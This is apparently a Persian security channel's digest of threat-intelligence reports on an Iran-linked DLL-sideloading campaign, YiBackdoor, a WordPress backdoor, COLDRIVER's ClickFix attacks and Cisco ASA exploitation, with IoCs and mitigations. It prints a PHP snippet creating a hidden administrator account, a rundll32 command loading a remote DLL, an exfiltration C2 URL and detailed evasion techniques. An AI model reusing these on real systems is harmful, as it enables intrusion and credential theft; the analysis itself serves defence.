این گروه هکری که به ایران منتسب است، در کمپین اخیر خود صنایع دفاعی، مخابراتی و هوانوردی در اروپای غربی (به‌ویژه دانمارک، سوئد و پرتغال) را هدف قرار داده است. رویکرد این گروه نشان‌دهنده بلوغ عملیاتی بالا و استفاده از تکنیک‌های پیشرفته برای فرار از شناسایی است.

۱.آغاز خمله

حمله با یک کمپین Spear-Phishing هدفمند آغاز می‌شود. مهاجمان با جعل هویت استخدام‌کنندگان شرکت‌های معتبر هوافضا مانند Boeing، Airbus و Rheinmetall، قربانیان را به پورتال‌های شغلی جعلی هدایت می‌کنند. این وب‌سایت‌ها با استفاده از قالب‌های مبتنی بر React ساخته شده و شباهت زیادی به نمونه‌های واقعی دارند. نکته قابل توجه در این مرحله، اختصاص URL و اعتبارنامه ورود (Credentials) منحصربه‌فرد برای هر قربانی است که به مهاجمان امکان ردیابی دقیق و مدیریت دسترسی را می‌دهد.

۲. زنجیره آلودگی و نوآوری فنی

زنجیره آلودگی این بدافزار چندمرحله‌ای و بسیار پیچیده است و از تکنیک‌های خلاقانه‌ای برای دور زدن مکانیزم‌های امنیتی بهره می‌برد.

* فایل اولیه: قربانی پس از ورود به پورتال جعلی، یک فایل آرشیو مخرب (مانند Survey.zip) را دانلود می‌کند. این فایل شامل یک فایل اجرایی قانونی به نام Setup.exe و چندین DLL مخرب است.

* تکنیک نوین DLL Sideloading: نوآوری اصلی این حمله در نحوه اجرای DLL Sideloading نهفته است.

1. با اجرای Setup.exe ، بدافزار از طریق فراخوانی توابع سطح پایین NT API (مشخصاً RtlCreateProcessParameters) ، ساختار RTL_USER_PROCESS_PARAMETERS پروسس را دستکاری می‌کند.

2. این دستکاری به‌طور خاص پارامتر DllPath را تغییر می‌دهد. این عمل باعث می‌شود که ترتیب جستجوی DLL در ویندوز (Windows DLL search order) تغییر کرده و DLL مخرب xmllite.dll از دایرکتوری فعلی (محل فایل‌های استخراج‌شده) بارگذاری شود، نه از مسیر سیستمی System32.

* سوءاستفاده از فرآیندهای معتبر ویندوز:

1. در مرحله بعد، DLL مخرب userenv.dll ، با استفاده از فراخوانی‌های سطح پایین ntdll، یک کامپوننت قانونی و امضاشده Windows Defender به نام SenseSampleUploader.exe را اجرا می‌کند.

2. از آنجایی که این فایل اجرایی معتبر نیز به xmllite.dll وابستگی دارد و به دلیل دستکاری مسیر جستجو، نسخه مخرب xmllite.dll توسط این فرآیند معتبر بارگذاری می‌شود. این تکنیک به‌طور مؤثری مکانیزم‌های دفاعی مبتنی بر شهرت و لیست سفید (Whitelisting) را دور می‌زند.

* ایجاد پایداری:

1. پس از بارگذاری موفق، xmllite.dll یک دایرکتوری کاری در مسیر %AppData%\Local\Microsoft\MigAutoPlay\ ایجاد کرده و کامپوننت‌های بک‌دور را در آن کپی می‌کند.

2. سپس یک Scheduled Task ایجاد می‌کند تا فایل MigAutoPlay.exe را به‌صورت دوره‌ای اجرا کند. این فایل اجرایی نیز به نوبه خود، DLL مخرب userenv.dll را که حاوی عملکرد اصلی بک‌دور است، Sideload می‌کند.

۳. پیلود نهایی: بک‌دور MiniJunk

بک‌دور اصلی که در این حمله استفاده شده، MiniJunk نام دارد و نسخه تکامل‌یافته‌ای از بدافزار قبلی این گروه (Minibike) است. این بک‌دور قابلیت‌های استانداردی مانند جمع‌آوری اطلاعات سیستم، مدیریت فایل‌ها (خواندن، نوشتن، حذف)، ایجاد فرآیندهای جدید و بارگذاری DLL‌های دلخواه را دارد.

۴. تکنیک‌های پیشرفته فرار از تحلیل

نقطه قوت اصلی بدافزار MiniJunk، استفاده سنگین از تکنیک‌های Obfuscation در سطح کامپایلر است. تحلیلگران معتقدند که مهاجمان از یک Pass سفارشی برای کامپایلر LLVM استفاده کرده‌اند تا تحلیل ایستا و مهندسی معکوس نمونه‌ها را تقریباً غیرممکن سازند. این تکنیک‌ها شامل موارد زیر است:

* درج کدهای بیهوده (Junk Code Insertion): افزودن کدهای اضافی که هیچ تأثیری بر عملکرد اصلی ندارند.

* مبهم‌سازی جریان کنترل (Control-Flow Obfuscation): پیچیده کردن گراف جریان کنترل برنامه با استفاده از پرش‌های شرطی غیرمستقیم و ساختارهای نامفهوم.

* گزاره‌های مبهم (Opaque Predicates): استفاده از شروطی که نتیجه آن‌ها در زمان کامپایل مشخص است اما تحلیلگر را گمراه می‌کند.

* رمزنگاری رشته‌ها (Encrypted Strings): هر رشته متنی در بدافزار با یک کلید منحصربه‌فرد رمزنگاری شده است تا از شناسایی مبتنی بر رشته جلوگیری شود.

* مبهم‌سازی فراخوانی توابع: آدرس توابع از طریق عملیات حسابی محاسبه می‌شود تا فراخوانی‌های مستقیم API پنهان شوند.

@NullError_ir

✅#YiBackdoor

ظهور بدافزار جدید YiBackdoor

بدافزار YiBackdoor که برای اولین بار در ژوئن 2025 شناسایی شده، یک خانواده بدافزاری جدید و پیچیده است که به دلیل همپوشانی قابل توجه کد با بدافزارهای شناخته‌شده IcedID و Latrodectus ، توجه تحلیلگران را به خود جلب کرده است. این بدافزار به عنوان یک بکدور عمل می‌کند و به مهاجمان اجازه می‌دهد تا کنترل سیستم قربانی را به دست گرفته، اطلاعات حساس را جمع‌آوری کرده و دستورات دلخواه را اجرا کنند.

نکات کلیدی و یافته‌های اصلی

* ارتباط با حملات باج‌افزاری: مشابه IcedID که از یک تروجان بانکی به یک ابزار دسترسی اولیه (Initial Access) برای حملات باج‌افزاری تبدیل شد، YiBackdoor نیز پتانسیل استفاده در چنین سناریوهایی را دارد.

* اشتراکات کد: این بدافزار بخش‌های قابل توجهی از کد خود، از جمله یک الگوریتم رمزنگاری منحصربه‌فرد را با IcedID و Latrodectus به اشتراک می‌گذارد که نشان‌دهنده ارتباط احتمالی بین تیم‌های توسعه‌دهنده آنهاست.

* تکنیک‌های ضدتحلیل: YiBackdoor مجهز به مکانیزم‌هایی برای شناسایی و دور زدن محیط‌های مجازی‌سازی شده و سندباکس‌های تحلیل بدافزار است.

* قابلیت‌های ماژولار: عملکرد اصلی بدافزار از طریق پلاگین‌ها گسترش می‌یابد، که به مهاجمان اجازه می‌دهد قابلیت‌های جدیدی را به صورت پویا به آن اضافه کنند.

* مرحله توسعه: با توجه به استقرار محدود و وجود برخی آدرس‌های IP محلی در پیکربندی، به نظر می‌رسد این بدافزار هنوز در مراحل توسعه یا آزمایش قرار دارد.

تحلیل فنی عمیق

۱. تکنیک‌های ضدتحلیل و فرار از شناسایی

این YiBackdoor از چندین تکنیک برای جلوگیری از تحلیل و شناسایی شدن توسط ابزارهای امنیتی استفاده می‌کند:

* بارگذاری دینامیک توابع API: به جای فراخوانی مستقیم توابع ویندوز (Windows API)، بدافزار با پیمایش لیست ماژول‌های بارگذاری شده و محاسبه هش مبتنی بر ROR برای نام هر تابع، آدرس توابع مورد نظر خود را به صورت پویا پیدا می‌کند. این روش از تحلیل استاتیک و شناسایی مبتنی بر ایمپورت‌ها جلوگیری می‌کند.

* شناسایی محیط مجازی:

* دستور CPUID: با فراخوانی دستور CPUID با پارامتر 0x40000000 ، اطلاعات هایپروایزر را استخراج کرده و آن را با مقادیر شناخته‌شده برای VMWare , Xen , KVM , VirtualBox , Hyper-V و Parallels مقایسه می‌کند.

* اندازه‌گیری زمان اجرا : بدافزار با استفاده از دستور rdtsc (Read Time-Stamp Counter) زمان اجرای دستور CPUID را اندازه‌گیری می‌کند. از آنجایی که اجرای CPUID در یک ماشین مجازی باعث یک VM exit می‌شود که زمان‌بر است، تفاوت زمانی قابل توجهی ایجاد می‌شود. این فرآیند ۱۶ بار تکرار شده و اگر مقدار محاسبه شده نهایی از یک آستانه مشخص (۲۰) بیشتر باشد، بدافزار تشخیص می‌دهد که در یک محیط مجازی در حال اجراست.

* رمزگشایی رشته‌ها در زمان اجرا: رشته‌های حساس به صورت رمز شده در کد قرار دارند و در زمان اجرا با یک کلید ۴ بایتی (منحصر به هر رشته) با عملیات XOR رمزگشایی می‌شوند.

نکته جالب این است که در نسخه تحلیل شده، بدافزار از اطلاعات به دست آمده از این بررسی‌ها استفاده‌ای نمی‌کند و این تکنیک‌ها تأثیری بر رفتار فعلی آن ندارند، که می‌تواند نشانه‌ای از تکامل نیافتن کامل کد باشد.

۲. فاز اولیه و اجرا

* تزریق کد:

1. بدافزار ابتدا با ایجاد یک Mutex با نام مبتنی بر مشخصات میزبان، از اجرای همزمان چند نمونه از خودش جلوگیری می‌کند.

2. سپس بررسی می‌کند که آیا در حافظه یک پروسس تزریق شده قرار دارد یا خیر. اگر در حافظه یک DLL بارگذاری شده باشد، یک پروسس جدید svchost.exe ایجاد می‌کند.

3. کد خود را در حافظه پروسس svchost.exe کپی کرده و تابع RtlExitUserProcess را هوک می‌کند. این هوک شامل یک دستور push برای قراردادن آدرس نقطه ورود بدافزار روی پشته و سپس یک دستور ret است.

4. در نتیجه، درست در لحظه‌ای که پروسس svchost.exe در حال خاتمه یافتن است، اجرای برنامه به کد بدافزار هدایت می‌شود. این تکنیک تزریق غیرمعمول می‌تواند برخی از محصولات امنیتی را دور بزند.

* پایداری:
پس از تزریق موفق، بدافزار خود را در یک پوشه جدید با نام تصادفی کپی کرده و سپس با استفاده از کلید رجیستری Run و دستور regsvr32.exe پایداری خود را در سیستم تضمین می‌کند. در نهایت، فایل اصلی خود را برای پاک کردن ردپا حذف می‌کند.

✅#WordPress

بدافزارهای مخفی وردپرسی

۱. معماری و هدف بدافزار

هدف اصلی این دو فایل، تضمین وجود یک حساب کاربری با سطح دسترسی Administrator است که توسط مهاجم کنترل می‌شود، حتی در صورت پاکسازی نسبی سیستم توسط مدیر سایت.

فایل‌های کلیدی کشف شده:

1۔ ./wp-content/plugins/DebugMaster/DebugMaster.php
یک Backdoor پیچیده و پنهان‌کار که خود را به عنوان یک افزونه قانونی (DebugMaster Pro) جا می‌زند. وظیفه اصلی آن ایجاد حساب کاربری ، Exfiltration اطلاعات و تزریق Payloadهای خارجی است.

2۔ ./wp-user.php
یک اسکریپت ساده‌تر اما تهاجمی که خود را به عنوان یک فایل اصلی (Core) WordPress در روت سایت معرفی کرده و مسئولیت بازآفرینی اجباری حساب کاربری مخرب را بر عهده دارد.

۲. تحلیل فنی DebugMaster.php: پنهان‌کاری، تزریق و C2

این فایل با محتوای به‌شدت Obfuscated و درهم‌ریخته، لایه‌های متعددی از پنهان‌کاری را برای فرار از شناسایی پیاده‌سازی کرده است:

الف. مکانیزم تزریق و پنهان‌سازی حساب کاربری

بدافزار از طریق قطعه کد زیر، یک حساب کاربری Administrator مخفی به نام help را با اعتبارنامه‌های Hardcoded ایجاد می‌کند:

if (!username_exists('help')) {
    $user_id = wp_create_user('help', 'hardcoded_password', 'help@site.com');
    $user = new WP_User($user_id);
    $user->set_role('administrator');
} else {
    $user = get_user_by('login', 'help');
    $user->set_role('administrator');
}

تکنیک‌های پنهان‌کاری:

* حذف از فهرست افزونه‌ها: بدافزار با Hook کردن فیلترهای WordPress، خود را از لیست افزونه‌های نصب شده پنهان می‌کند تا از چشم مدیر سیستم دور بماند.

* فیلتر کردن کاربران: کد مخرب همچنین فیلترهایی را اعمال می‌کند تا حساب کاربری help در لیست کاربران پنل ادمین نمایش داده نشود و امکان حذف دستی آن به سادگی فراهم نباشد.

ب. ارتباط با سرور Command & Control (C2) و Exfiltration داده‌ها

این بخش فنی‌ترین و پیشرفته‌ترین جنبه این Backdoor است. بدافزار برای اطمینان از اطلاع‌رسانی فوری به مهاجم، جزئیات حساب کاربری تازه ایجاد شده را به یک سرور خارجی ارسال می‌کند.

فرآیند Exfiltration:

1. جمع‌آوری داده‌ها: اطلاعات حساس (نام کاربری، رمز عبور، ایمیل و آدرس IP سرور) در قالب یک شیء JSON جمع‌آوری می‌شود.

2. رمزگذاری (Encoding): داده‌های JSON جهت فرار از امضاهای ساده شبکه، با استفاده از الگوریتم Base64 رمزگذاری می‌شوند.

3. ارسال به C2: داده‌های رمزگذاری شده با متد HTTP POST به یک آدرس URL مخفی شده ارسال می‌شوند. آدرس C2 نیز خود با Base64 Obfuscated شده که به hxxps://kickstar-xbloom[.]info/collect[.]php رمزگشایی می‌شود.

این فرآیند نشان‌دهنده یک کانال C2 فعال است که مختصراً برای Data Exfiltration استفاده شده و امکان مدیریت متمرکز اعتبارنامه‌های دزدیده شده را برای مهاجم فراهم می‌آورد.

ج. تزریق Scripts مخرب و ردیابی ادمین

۔ DebugMaster.php همچنین کدی را برای تزریق اسکریپت‌های خارجی به وب‌سایت پیاده‌سازی می‌کند. این اسکریپت‌ها برای تمام بازدیدکنندگان بارگذاری می‌شوند، مگر آنکه کاربر جاری یک Administrator باشد یا IP او قبلاً توسط بدافزار Whitelist شده باشد. علاوه بر این، بدافزار آدرس‌های IP مدیران سایت را جمع‌آوری و Log می‌کند؛ این اطلاعات می‌تواند برای حملات هدفمندتر یا فیلتر کردن آن‌ها از دریافت Payloadهای مخرب در آینده استفاده شود.

۳. تحلیل فنی wp-user.php: مکانیزم Resilience

این فایل، نقش پشتیبان و Persistence Layer را ایفا می‌کند. محل قرارگیری آن در پوشه روت، یک تلاش آشکار برای تقلید از فایل‌های هسته WordPress است.

منطق بازآفرینی (Recreation Logic):

1. اسکریپت وجود کاربر help را در دیتابیس WordPress بررسی می‌کند.

2. اگر کاربر help وجود داشته باشد: آن را حذف کرده و بلافاصله با رمز عبور و سطح دسترسی Administrator مدنظر مهاجم مجدداً ایجاد می‌کند.

3. اگر کاربر help وجود نداشته باشد: آن را به سادگی ایجاد می‌کند.

این منطق تهاجمی تضمین می‌کند که هر تلاشی از سوی مدیر سایت برای حذف حساب کاربری help یا تغییر رمز عبور آن، تنها به بازآفرینی فوری حساب با اعتبارنامه‌های اصلی مهاجم منجر شود. این یک مکانیزم Resilience بسیار قدرتمند است.

۴۔ Indicators of Compromise (IoCs)

برای شناسایی آلودگی، به دنبال شواهد زیر باشید:

فایل‌های مخرب wp-content/plugins/DebugMaster/DebugMaster.php (و دایرکتوری آن)

وجود wp-user.php در پوشه روت

حساب کاربری وجود کاربر Administrator مخفی یا غیرمجاز با نام help

رفتار مشکوک بازآفرینی خودکار حساب‌های ادمین حذف شده

ارتباط شبکه ترافیک خروجی به kickstar-xbloom[.]info یا collect.php

✅#COLDRIVER

تحلیل حملات COLDRIVER با بدافزارهای BAITSWITCH و SIMPLEFIX

گروه روسی COLDRIVER (که با نام‌های Star Blizzard و Callisto نیز شناخته می‌شود) و شهرت آن در هدف‌گیری فعالان جامعه مدنی، روزنامه‌نگاران و گروه‌های اپوزیسیون است، زرادخانه خود را با دو بدافزار جدید به‌روزرسانی کرده است: BAITSWITCH (Downloader) و SIMPLEFIX (PowerShell Backdoor). این کمپین جدید که در سپتامبر ۲۰۲۵ کشف شد، تمرکز بر تکنیک‌های مهندسی اجتماعی داشته و از یک زنجیره آلودگی پیچیده چندمرحله‌ای برای حفظ پایداری و جمع‌آوری اطلاعات استفاده می‌کند.

۱. مکانیزم حمله و مهندسی اجتماعی (ClickFix)

این حمله با تکیه بر ضعف کاربر، از روش ClickFix استفاده می‌کند که اگرچه از نظر فنی پیچیده نیست، اما برای اهداف گروه COLDRIVER بسیار مؤثر بوده است.

1. طراحی فریب: قربانی به صفحه‌ای هدایت می‌شود که خود را به عنوان یک منبع اطلاعاتی برای فعالان مدنی روس معرفی می‌کند. این صفحه یک چک‌باکس جعلی Cloudflare Turnstile نمایش می‌دهد.

2. اجرای دستوری: با کلیک کاربر، کد JavaScript صفحه یک دستور مخرب (rundll32.exe \\captchanom.top\check\machinerie.dll,verifyme) را در کلیپ‌بورد کپی می‌کند. سپس کاربر فریب داده می‌شود تا این دستور را در دیالوگ باکس Windows Run (Win + R) جای‌گذاری و اجرا کند.

3. فایل فریب (Decoy): بلافاصله پس از اجرا، قربانی به یک داکیومنت فریبنده با میزبانی Google Drive هدایت می‌شود تا توجه وی از فرآیند آلودگی منحرف شود.
این اقدام منجر به اجرای فایل machinerie.dll که همان بدافزار BAITSWITCH است، از طریق تابع rundll32.exe می‌شود.

۲۔ BAITSWITCH: مهندسی پایداری و Staging
۔ BAITSWITCH (Machinerie.dll) یک Downloader چند وظیفه‌ای است که وظیفه اصلی آن برقراری پایداری و آماده‌سازی سیستم برای استقرار SIMPLEFIX است.

الف. تکنیک‌های دفاعی

*۔ Traffic Signaling: این بدافزار از یک User-Agent استرینگ (Mozilla/5.0...Chrome/131.0.0.0 Safari/537.36 Edge/133.0.0.0) برای برقراری ارتباط با سرور C2 استفاده می‌کند. سرور C2 تنها در صورت دریافت این User-Agent مشخص پاسخ می‌دهد و در غیر این صورت، پاسخ 404 Not Found ارسال می‌کند. این یک مکانیزم ساده و مؤثر برای جلوگیری از تحلیل خودکار و شناسایی توسط ساندباکس‌ها است.

# ب. زنجیره فرماندهی (Command Chain)

۔BAITSWITCH یک توالی پنج مرحله‌ای از درخواست‌های HTTP به دامنه‌های تحت کنترل مهاجم (captchanom[.]top) را اجرا می‌کند که هر کدام منجر به اجرای دستورات حیاتی می‌شوند:

1۔ Persistence: اجرای دستور reg add برای تنظیم کلید رجیستری UserInitMprLogonScript در HKCU\Environment. این کلید تضمین می‌کند که اسکریپت PowerShell نهایی در ورود بعدی کاربر به سیستم اجرا شود.

2۔ Fileless Storage : اجرای PowerShell برای ذخیره اسکریپت مخرب نهایی که به‌صورت Base64-encoded و AES-encrypted است و همچنین کلید Decryption آن، در کلیدهای رجیستری (مانند EnthusiastMode و QatItems ) مربوط به یک CLSID کاذب. این یک تکنیک Defense Evasion قوی برای پنهان کردن Payload است.

3۔ Download Stager: دانلود اسکریپت Stager اولیه PowerShell و ذخیره آن در مسیر %APPDATA% (همان فایلی که در مرحله پایداری به آن ارجاع داده شده است).

4۔ Indicator Removal: حذف کلید رجیستری RunMRU که حاوی تاریخچه دستورات اجرا شده در دیالوگ باکس Run است، برای پاک کردن ردپای حمله ClickFix.

5۔ Victim Registration: ارسال نام میزبان (Hostname) قربانی به C2 برای ثبت موفقیت‌آمیز آلودگی.

۳۔ SIMPLEFIX: Backdoor مبتنی بر PowerShell و جمع‌آوری اطلاعات

در ورود مجدد کاربر، اسکریپت Stager اولیه اجرا می‌شود. این اسکریپت به‌صورت Fileless ، اسکریپت AES-encrypted را از رجیستری خوانده، آن را با استفاده از ترکیب کلید Hardcoded و پارامتر خط فرمان، رمزگشایی و اجرا می‌کند. خروجی نهایی، بدافزار SIMPLEFIX است.

# الف. مکانیزم‌های C2 و شناسایی (Discovery)

*۔ Beaconing (ارسال سیگنال): SIMPLEFIX هر ۳ دقیقه یک بار اقدام به برقراری ارتباط با C2 (southprovesolutions[.]com) می‌کند.

*۔ User-Agent داینامیک: SIMPLEFIX یک User-Agent منحصر به فرد با ترکیب نام کامپیوتر، نام کاربری و UUID ماشین تولید می‌کند که در تمام درخواست‌های C2 گنجانده می‌شود. این تکنیک به مهاجم کمک می‌کند تا قربانیان را در سمت سرور به دقت شناسایی کند (T1033).

✅#Cisco

🔥 از Zero-Day RCE سیسکو (CVE-2025-20333)
تا بوت‌کیت RayInitiator در GRUB 💀

تحلیل آسیب‌پذیری و بهره‌برداری در Cisco

سیر تحولی یک رویداد امنیتی حیاتی در پلتفرم‌های Cisco Secure Firewall ASA و FTD و یک عملیات سایبری بسیار پیشرفته و Zero-Day در سطح APT است که مستلزم اقدامات دفاعی فوری می‌باشد.

خلاصه و ترکیب آسیب‌پذیری‌ها (CVE Correlation)

آسیب‌پذیری اصلی، نقص بحرانی Remote Code Execution (RCE) در مؤلفه VPN Web Server است که هنگام فعال بودن سرویس‌های AnyConnect SSL VPN یا Webvpn قابل بهره‌برداری است.

CVE-2025-20333 => ۹.۹ (Critical) => هسته RCE => Buffer Overflow (CWE-120)
آسیب‌پذیری اصلی RCE: امکان اجرای کد دلخواه با دسترسی Root. بهره‌برداری فعال توسط APT**ها. رسماً نیاز به **Credentials VPN دارد.

CVE-2025-20362 => ۶.۵ (Medium) => پیش‌نیاز (Pre-Auth) => Unauthorized Access
نقص دور زدن احراز هویت: مهاجم را قادر می‌سازد تا بدون Credential به Endpointهای محدود VPN دست یابد. پتانسیل بالای اتصال به CVE-2025-20333 در یک Attack Chain.

CVE-2025-20363 => ۹.۰ (Critical) => گزارش اولیه => Input Validation Flaw (CWE-122)
گزارش اولیه و ناهمگون: مربوط به Input Validation. احتمالاً یک نقص کلی مرتبط یا گزارش اولیه است که توسط CVE-2025-20333 با دقت بیشتری (Buffer Overflow) توصیف شد.

نکته فنی: هرچند CVE-2025-20333 رسماً نیاز به احراز هویت دارد، اما وجود CVE-2025-20362 یک تهدید جدی برای ایجاد زنجیره حمله (Attack Chain) فراهم می‌کند که می‌تواند نیاز به Credential معتبر را حذف کرده و RCE را به یک عملیات Pre-Authentication RCE تبدیل کند.

تحلیل APT و بدافزارهای استقراری

این کمپین توسط یک عامل تهدید دولتی (State-Sponsored Threat Actor) با هدف جاسوسی سایبری انجام شده و از یک ابزار جنگی دو مرحله‌ای بسیار پیشرفته استفاده می‌کند:

۱۔ RayInitiator (بوت‌کیت: Persistence در سطح GRUB)

این بدافزار، یک Multi-Stage Bootkit است که مستقیماً برای ایجاد پایداری (Persistence) عمیق و مقاوم طراحی شده است.

* مکانیسم: RayInitiator خود را در Grand Unified Bootloader (GRUB) دستگاه Flash می‌کند.

* مزیت APT: این مکانیسم به بدافزار اجازه می‌دهد تا از ریبوت‌های سیستمی و حتی بروزرسانی‌های معمول Firmware جان سالم به در ببرد و یک Foot-hold دائمی و بسیار دشوار برای حذف ایجاد کند.

* هدف: به‌طور خاص مدل‌های قدیمی‌تر Cisco ASA 5500-X Series را هدف قرار می‌دهد که فاقد فناوری Secure Boot هستند.

۲۔ LINE VIPER (Payload Memory-Resident: ضد بدافزارکاوی)

این بدافزار، یک Shellcode Loader است که مستقیماً در حافظه (Memory-Resident) اجرا می‌شود و بخش اصلی کنترل مهاجم را فراهم می‌کند:

* اجرای فرمان: امکان اجرای دستورات با بالاترین سطح دسترسی (Privilege Level 15).

۔ Data Exfiltration تخصصی: قابلیت انجام Packet Capture مخفیانه از پروتکل‌های احراز هویت حیاتی شبکه شامل RADIUS، LDAP و TACACS برای سرقت Credentials (اعتبارنامه‌ها).

۔ Evasion و Anti-Forensics: یکی از پیشرفته‌ترین تاکتیک‌های آن، قابلیت ریبوت فوری دستگاه در صورت تلاش مدیران برای گرفتن Core Dump یا اجرای دستورات خاص تحلیلی است. این اقدام، تلاش‌های تحلیلگران برای بدافزارکاوی (Malware Analysis) را مختل می‌کند.

۔ C2 پیچیده: استفاده از کانال‌های رمزگذاری‌شده HTTPS WebVPN و همچنین یک کانال ثانویه C2 با استفاده از ICMP Tunneling درون یک جلسه VPN، که شناسایی ارتباطات فرمان و کنترل را بسیار سخت می‌کند.

نتیجه‌گیری و راهکارهای مقابله پیشرفته

با توجه به ماهیت APT و سطح نفوذ (Root Shell و Bootkit)، تنها راه مقابله، مدیریت سریع Incident و اعمال تغییرات ساختاری است.

الف) راهکار حاد و فوری (Emergency Response)

۱۔ Patching اضطراری (Urgent Patching): هیچ Workaround مؤثری وجود ندارد. سازمان‌ها باید فوراً تمامی دستگاه‌های ASA/FTD را با استفاده از Cisco Software Checker به آخرین نسخه‌های اصلاح‌شده ارتقاء دهند.

۲۔ Audit پیکربندی VPN: با استفاده از دستور show running-config ، فعال بودن سرویس‌های Webvpn یا AnyConnect SSL VPN را بررسی و در صورت عدم امکان Patching فوری، آن‌ها را موقتاً غیرفعال کنید (با علم به تأثیر آن بر Business Continuity).

۳. شکار تهدید (Threat Hunting):

* در اسرع وقت قوانین YARA مرتبط با RayInitiator و LINE VIPER را در سیستم‌های تشخیص تهدید (Threat Detection Systems) خود پیاده‌سازی کنید.

* مراقب شاخص آلودگی (IOC) کلیدی باشید: هرگونه ریبوت غیرمنتظره دستگاه ASA پس از تلاش برای گرفتن Core Dump، باید به‌عنوان یک هشدار قطعی آلودگی به LINE VIPER تلقی شود.